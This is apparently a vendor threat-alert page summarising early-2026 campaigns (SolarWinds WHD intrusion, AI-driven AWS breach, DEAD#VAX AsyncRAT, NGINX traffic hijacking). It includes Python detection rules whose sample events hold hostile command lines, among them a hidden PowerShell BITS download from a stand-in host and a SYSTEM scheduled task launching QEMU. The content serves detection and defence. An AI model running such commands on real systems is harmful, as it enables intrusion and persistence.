Threat Alerts

Your place for the latest CyberProof cyber threat intelligence alerts and updates


Large-Scale Botnets Fuel Spike in DDoS Attacks

09-Feb-2026
Label: Trend
Threat Level: Medium

Distributed denial-of-service (DDoS) activity increased sharply in 2025, with total attacks rising 121% year over year to 47.1 million, reflecting a significant escalation in both frequency and scale. Late-year activity included record-setting hyper-volumetric events, such as a 31.4 Tbps attack and the “Night Before Christmas” campaign in December, which delivered sustained HTTP floods exceeding 20 million requests per second and peaked at 9 Bpps and 24 Tbps. These spikes were largely attributed to the Aisuru-Kimwolf botnet, a large network of an estimated 1–4 million compromised Android TV devices. The continued growth of both network-layer and application-layer DDoS attacks increases risk to telecommunications providers, service operators, and other critical infrastructure, where service disruption and latency have immediate operational impact.

SolarWinds WHD Exploitation Leads to Full Domain Compromise

09-Feb-2026
Label: Vulnerability
Threat Level: Medium

Threat actors have exploited internet-exposed SolarWinds Web Help Desk (WHD) instances to establish initial access and move laterally toward high-value organizational assets, demonstrating how a single exposed application can lead to full domain compromise when vulnerabilities remain unpatched or insufficiently monitored. The attacks potentially involved CVE-2025-40551 and CVE-2025-40536, disclosed on January 28, 2026, or the previously known CVE-2025-26399, though the exact vulnerability remains unconfirmed since the December 2025 attacks occurred on machines vulnerable to both old and new CVEs simultaneously. Attackers employed living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms, emphasizing the need for defense in depth, timely patching of internet-facing services, and behavior-based detection across identity, endpoint, and network layers.

Following successful exploitation that enabled unauthenticated remote code execution on internet-facing deployments, the compromised WHD service spawned PowerShell to leverage BITS for payload download and execution, with downloaded binaries installing components of Zoho ManageEngine, a legitimate remote monitoring and management solution. The attackers enumerated sensitive domain users and groups, including Domain Admins, before establishing reverse SSH and RDP access for persistence. In some environments, attackers created scheduled tasks to launch QEMU virtual machines under the SYSTEM account at startup, hiding malicious activity within virtualized environments while exposing SSH access via port forwarding. On certain hosts, threat actors used DLL sideloading by abusing wab.exe to load a malicious sspicli.dll, enabling access to LSASS memory and credential theft while reducing detections focused on well-known dumping tools.

Activity escalated to DCSync from the original access host in at least one case, indicating the use of high-privilege credentials to request password data from a domain controller. The entire intrusion chain relied heavily on living-off-the-land techniques and legitimate administrative tools, making detection more challenging through traditional security controls. This incident illustrates the critical vulnerability window created by exposed enterprise applications and the cascading impact when initial access translates into privileged credential compromise and domain-wide control.
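The chain above is built from legitimate tooling, so detection has to key on parent/child and load relationships rather than on a known-bad binary. The following is an added example, not code from the CyberProof alert or any vendor product: three process and image-load rules for the described behaviours, run over constructed Sysmon-style events; the host names, paths and download URL are assumptions.

```python
# Added example, not from the CyberProof alert or any vendor product: three
# detections for the WHD chain described above, run over constructed
# Sysmon-style events. Host names, paths and the URL are assumptions.
import ntpath

# Constructed telemetry: process creations and image loads on two hosts.
EVENTS = [
    {"type": "process", "host": "whd01", "parent": r"C:\Program Files\WebHelpDesk\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden Start-BitsTransfer -Source http://example.invalid/a.exe -Destination C:\\Users\\Public\\a.exe"},
    {"type": "process", "host": "whd01", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /ru SYSTEM /sc onstart /tn Updater /tr "C:\\ProgramData\\qemu\\qemu-system-x86_64.exe -hda d.qcow2"'},
    {"type": "imageload", "host": "whd01", "image": r"C:\Program Files\Windows Mail\wab.exe",
     "loaded": r"C:\Users\Public\sspicli.dll"},
    {"type": "imageload", "host": "ws22", "image": r"C:\Program Files\Windows Mail\wab.exe",
     "loaded": r"C:\Windows\System32\sspicli.dll"},  # legitimate load, must not fire
]

def _base(path):
    return ntpath.basename(path).lower()

def rule_whd_spawns_bits_powershell(ev):
    """WHD service (Java) spawning PowerShell that pulls a payload via BITS."""
    return (ev["type"] == "process"
            and "webhelpdesk" in ev["parent"].lower()
            and _base(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and any(k in ev["cmdline"].lower() for k in ("start-bitstransfer", "bitsadmin")))

def rule_system_task_runs_qemu(ev):
    """Scheduled task created to start QEMU as SYSTEM at boot."""
    cmd = ev.get("cmdline", "").lower()
    return (ev["type"] == "process" and _base(ev["image"]) == "schtasks.exe"
            and "/create" in cmd and "/ru system" in cmd and "qemu" in cmd)

def rule_wab_sideloads_sspicli(ev):
    """wab.exe loading sspicli.dll from any directory other than System32."""
    if ev["type"] != "imageload" or _base(ev["image"]) != "wab.exe":
        return False
    loaded = ev["loaded"].lower()
    return _base(loaded) == "sspicli.dll" and not loaded.startswith("c:\\windows\\system32\\")

RULES = {"whd_powershell_bits": rule_whd_spawns_bits_powershell,
         "system_task_qemu": rule_system_task_runs_qemu,
         "wab_sspicli_sideload": rule_wab_sideloads_sspicli}

def detect(events):
    """Return (rule_name, host) for every event that matches a rule."""
    return [(name, ev["host"]) for ev in events for name, rule in RULES.items() if rule(ev)]
```

The fourth event is the benign control: wab.exe loading the real sspicli.dll from System32 produces no alert, so the rule keys on the load path rather than on the DLL name alone.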

AI-Powered AWS Environment Breach in 8 Minutes

09-Feb-2026
Label: Malware
Threat Level: Medium

Threat actors leveraged AI technologies to compromise an AWS environment in under 10 minutes, demonstrating how large language models accelerate cyberattacks. The attackers used generative AI to automate reconnaissance, generate malicious code, and make real-time decisions throughout their operation.

The attack began when hackers discovered credentials stored in public AWS S3 buckets. Using these credentials, they executed Lambda function code injection to escalate privileges and hijack user accounts, ultimately gaining full administrative access. The attackers moved laterally through 19 identities across 14 sessions, collecting sensitive data from multiple AWS services including secrets, system parameters, logs, and function source code. The speed and sophistication of their code, written with comprehensive exception handling, strongly indicated AI generation.

After establishing administrative control, the threat actors shifted focus to resource abuse, launching an LLMjacking attack against Amazon Bedrock to access various AI models. They attempted GPU hijacking by trying to spin up high-performance computing instances, successfully deploying a smaller instance that would have cost the victim $23,600 monthly if undetected. This incident represents an evolution in the threat landscape, where AI-powered attacks can complete complex operations from initial access to full compromise in minutes rather than hours or days.
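Because the actor rotated through many identities and sessions, a per-user baseline would miss the chain; correlating the stages across identities within a short window is what surfaces it. As an added example that is not part of the alert, the following maps constructed CloudTrail-style records to the three described stages (Lambda code injection, Bedrock LLMjacking, GPU instance launch) and flags the burst in which all three appear; field names follow CloudTrail, while the ARNs, timestamps and the 10-minute window are assumptions.

```python
# Added example, not part of the alert: correlates the three stages of the
# AWS intrusion described above (Lambda code injection, Bedrock LLMjacking,
# GPU instance launch) over constructed CloudTrail-style records. Field names
# follow CloudTrail; ARNs, timestamps and the 10-minute window are assumptions.
from datetime import datetime, timedelta

RECORDS = [  # constructed, not real telemetry
    {"eventTime": "2026-01-15T10:00:05Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "UpdateFunctionCode20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/leaked-s3-key"}},
    {"eventTime": "2026-01-15T10:02:40Z", "eventSource": "bedrock.amazonaws.com",
     "eventName": "InvokeModel",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/admin/sess1"}},
    {"eventTime": "2026-01-15T10:05:10Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "RunInstances", "requestParameters": {"instanceType": "p4d.24xlarge"},
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/admin/sess2"}},
    {"eventTime": "2026-01-15T15:00:00Z", "eventSource": "ec2.amazonaws.com",  # benign
     "eventName": "RunInstances", "requestParameters": {"instanceType": "t3.micro"},
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/ops"}},
]

STAGES = {"lambda_code_injection", "bedrock_llmjacking", "gpu_instance_launch"}

def stage(rec):
    """Map one record to a stage of the described chain, or None if unrelated."""
    src, name = rec["eventSource"], rec["eventName"]
    if src == "lambda.amazonaws.com" and name.startswith("UpdateFunctionCode"):
        return "lambda_code_injection"
    if src == "bedrock.amazonaws.com" and name.startswith("InvokeModel"):
        return "bedrock_llmjacking"
    if src == "ec2.amazonaws.com" and name == "RunInstances":
        # p* and g* are EC2 accelerated (GPU) families; assumption: treat them as hijack candidates.
        if rec.get("requestParameters", {}).get("instanceType", "")[:1] in ("p", "g"):
            return "gpu_instance_launch"
    return None

def correlate(records, window=timedelta(minutes=10)):
    """Return the first burst in which all stages appear within `window`, across
    any identities, or None. Identity-agnostic because the actor rotated sessions."""
    hits = sorted((datetime.strptime(r["eventTime"], "%Y-%m-%dT%H:%M:%SZ"), stage(r),
                   r["userIdentity"]["arn"]) for r in records if stage(r))
    for i, (t0, _, _) in enumerate(hits):
        burst = [h for h in hits[i:] if h[0] - t0 <= window]
        if {h[1] for h in burst} >= STAGES:
            return {"start": t0.isoformat(), "stages": [h[1] for h in burst],
                    "identities": sorted({h[2] for h in burst})}
    return None
```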

DEAD#VAX Campaign Leverages VHD Abuse for Fileless AsyncRAT Deployment

09-Feb-2026
Label: Malware
Threat Level: Medium

A sophisticated malware campaign has been identified that employs an uncommon chain of techniques, including VHD file abuse, script-based execution, self-parsing batch logic, and fileless PowerShell injection, ultimately deploying a Remote Access Trojan (RAT). The attack leverages IPFS-hosted VHD files, extreme script obfuscation, runtime decryption, and in-memory shellcode injection into trusted Windows processes, never dropping a decrypted binary to disk. Modern malware campaigns increasingly rely on trusted file formats, script abuse, and memory-resident execution to bypass traditional security controls.

The infection chain begins with a phishing email delivering a Virtual Hard Disk (VHD) hosted on IPFS infrastructure and progresses through a sequence of Windows Script Files (WSF), heavily obfuscated batch scripts, and self-parsing PowerShell loaders. The final payload is delivered as encrypted x64 shellcode, which is injected directly into trusted Windows processes and executed entirely in memory, without ever dropping a decrypted executable to disk. Malware authors package payloads inside container formats like VHD or image files to bypass the mark-of-the-web (MotW). When a VHD file is downloaded, the VHD file itself receives the mark of the web, but when the user double-clicks the VHD file to mount it, the file system inside the VHD is treated as a separate volume; the files inside do not inherit the mark of the web from the container and appear as local files residing on a local disk.

Execution flows through WSF, batch, and PowerShell scripts, avoiding traditional malware binaries during the early stages. The batch stage employs environment variable explosion and reads its own contents to extract an encrypted payload. PowerShell strings are protected using a combination of Unicode junk insertion, Base64 encoding, rolling XOR decryption, and ROT-style character shifting, ensuring no meaningful indicators exist in cleartext. The final malware stage is stored as noise-polluted Base64 data, decoded into raw shellcode and never written to disk in decrypted form, with the loader injecting shellcode into trusted, Microsoft-signed processes using native Win32 APIs. Dynamic analysis confirmed that the shellcode deploys a fully functional AsyncRAT implant capable of long-term surveillance, data exfiltration, and follow-on attacks. Anti-sandbox checks, persistence rotation, execution throttling, and memory-only payloads collectively reduce detection and forensic visibility.

Malicious NGINX Configurations Enable Traffic Interception

09-Feb-2026
Label: Malware
Threat Level: Medium

An active web traffic hijacking campaign has been identified targeting NGINX deployments and management panels such as Baota, where malicious configuration changes enable interception of legitimate user traffic and redirection to attacker-controlled backend servers. The activity primarily impacts Asian top-level domains (including .in, .id, .pe, .bd, .edu, .gov, and .th) as well as Chinese hosting infrastructure, highlighting geographically focused targeting. By exploiting weak configurations or previously compromised environments, threat actors effectively position themselves as adversaries-in-the-middle, silently rerouting web sessions without user awareness and turning trusted web infrastructure into a persistent traffic interception mechanism.

The campaign uses a multi-stage automated toolkit with discovery, persistence and configuration-injection capabilities. Initial scripts orchestrate execution and can establish raw TCP connections to send HTTP requests when standard utilities are unavailable, while enumeration logic searches for management panel configuration paths and prior proxy injections before proceeding. Malicious routines dynamically select domain-specific templates, back up original configurations and overwrite NGINX server directives with injected location and proxy_pass rules that redirect traffic through attacker infrastructure. To avoid service disruption, scripts attempt graceful NGINX reloads before fallback restarts, ensuring malicious rules remain active. A reporting component inventories hijacked domains, injected templates and redirection endpoints, storing this intelligence in temporary mapping files that are later exfiltrated to command-and-control servers via curl or raw TCP channels. The campaign demonstrates how manipulation of foundational web server configurations can provide durable, covert traffic interception across targeted hosting environments.
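The durable artefact of this campaign is a `location` block whose `proxy_pass` points at an upstream the operator never configured, so a configuration audit can catch it even after logs are gone. As an added example that is not part of the alert or of any vendor tooling, the following walks NGINX `location` blocks with brace matching and reports every `proxy_pass` whose host is outside an allowlist of known backends; the sample configuration, the external address and the allowlist are constructed for illustration.

```python
# Added example, not part of the alert or any vendor tooling: scans NGINX
# configuration text for proxy_pass upstreams outside an allowlist, the kind
# of injected rule the campaign above plants. The config, the external host
# and the allowlist are constructed for illustration.
import re
from urllib.parse import urlparse

# Constructed config: one legitimate app backend and one injected location.
SAMPLE_CONF = """
server {
    listen 80;
    server_name shop.example.test;
    location / {
        proxy_pass http://127.0.0.1:8080;
    }
    location ~* ^/(login|checkout) {
        proxy_set_header Host $host;
        proxy_pass http://203.0.113.45:8443;   # injected: external upstream
    }
}
"""

# Upstreams the operator actually runs (assumption for this example).
KNOWN_UPSTREAMS = {"127.0.0.1", "localhost", "app-backend"}

DIRECTIVE = re.compile(r"proxy_pass\s+(\S+?)\s*;")
LOCATION = re.compile(r"location\s+([^{]+?)\s*\{")

def find_locations(conf):
    """Yield (location_args, block_body) for each location block, brace-balanced."""
    for m in LOCATION.finditer(conf):
        depth, start = 1, m.end()
        for i in range(start, len(conf)):
            depth += {"{": 1, "}": -1}.get(conf[i], 0)
            if depth == 0:
                yield m.group(1).strip(), conf[start:i]
                break

def suspicious_proxy_passes(conf, known=KNOWN_UPSTREAMS):
    """Return (location_args, upstream_host) for proxy_pass targets not in the allowlist."""
    hits = []
    for loc, body in find_locations(conf):
        for target in DIRECTIVE.findall(body):
            # A bare name (no scheme) refers to a named upstream{}; treat the name as the host.
            host = urlparse(target if "://" in target else "//" + target).hostname
            if host and host not in known:
                hits.append((loc, host))
    return hits
```

Running the scan over each vhost file after every configuration change, and diffing against the operator's backup, also catches the case the campaign relies on: the backed-up original is intact while the live file carries the injected block.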

End-of-Support Edge Devices Flagged as Persistent Exploitation Risk

09-Feb-2026
Label: Threat Advisory
Threat Level: Medium

Unsupported network edge devices, including routers, firewalls, and switches, have been flagged by U.S. cybersecurity authorities as a persistent exploitation risk due to the absence of vendor security updates and exposure to newly discovered vulnerabilities. A new federal directive mandates rapid identification and replacement of end-of-life edge infrastructure across government networks, reflecting widespread exploitation of unsupported perimeter devices by advanced threat actors. While the requirement applies to U.S. federal agencies, edge devices remain a high-value target in ongoing attacks—particularly by Chinese state-linked threat groups—making this risk relevant across all sectors operating exposed or legacy network infrastructure.
